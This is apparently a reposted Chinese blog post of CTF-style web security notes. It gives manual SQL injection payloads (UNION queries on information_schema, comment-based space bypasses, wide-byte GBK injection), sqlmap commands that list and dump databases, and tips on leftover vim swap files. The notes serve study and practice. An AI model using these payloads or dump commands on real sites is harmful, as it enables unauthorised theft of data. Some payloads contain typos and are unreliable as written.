信安 web 的一些心得与笔记整理(1)


sql 手工注入:

绕过空格的方法:
+ %0a %0b /**/

mysql:

在mysql中,有一个库叫做 information_schema,里面包含了数据库中所有库的信息,我们可以在注入的时候用它来做很多坏事情。

注入点的确定:

用select database() 来确定数据库名称 1’ union select database()’
调用information_schema 来查看所有信息,我们可以用它来做很多坏事
1’ union select table_name from information_schema.tables where table_schema =’ <数据表名>

有时候,会过滤掉你的关键词,这时候,把关键词打两遍或许有奇效。

确定字段名
1’ union select column_name from informaiton_schema.columnsa where table_name=’<字段名>

确定字段名中的内容
1’ union select from where ‘1’=’1
1’ union//select//flag from//flag where//’1’=’1
<备注:我感觉用#不太好,因为会被过滤掉,还是上头那个靠谱>
‘//union//select//flag//from/**/flag#

(注入点都用1’来代替了,具体操作都不一样。明智的人应该懂得如何手注而不是用工具)

sqlmap 搞事:

sqlmap -u”” 直接查看嘛~~ 然后加上 –dbs 倒库
(前提是你要找到注入点啊!!!)

找到库了之后呢 就 sqlmap -u “” -D <表名> –tables
(备注 -D 是进入,–tables 能够查看当前库下的东西)

然后 sqlmap -u “” -D <表名> -T <字段> <字段> –dump
(备注 –dump 能够把数据里的东西全部到出来)
(就是一次比较简单的sqlmap搞事了)

宽字节与gbk编码

注入 特征:

出现 11’ and 1=2 # 时候会变成
’ 1\’ and 1=2 # 为了把\给去掉
要改为 11%df%27 and 1=2 # /%df就是一个宽字节 %27 是引号
(可能这里理解有问题。。。。。。。。。。。。)
1’ union select 1,database()
%df’ union select 1,database() %23

关于宽字节的可以看看这里

vim的备份文件:

一些愚蠢的开发者会把vim的备份文件不删掉,
用/.《name》.swp 访问它

burpsuite:

简单的抓包,截包,改包操作。
对于包的熟悉能够让你做很多事情
以后burp的功能会在做题中慢慢提升

PHP 超好用的在线编译软件:

http://www.shucunwang.com/RunCode/php/

php测试在线网站

就这样随意写点觉得重要的知识点吧,可能有地方有错误的,欢迎指正哈哈。


注意!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系我们删除。



 
粤ICP备14056181号  © 2014-2021 ITdaan.com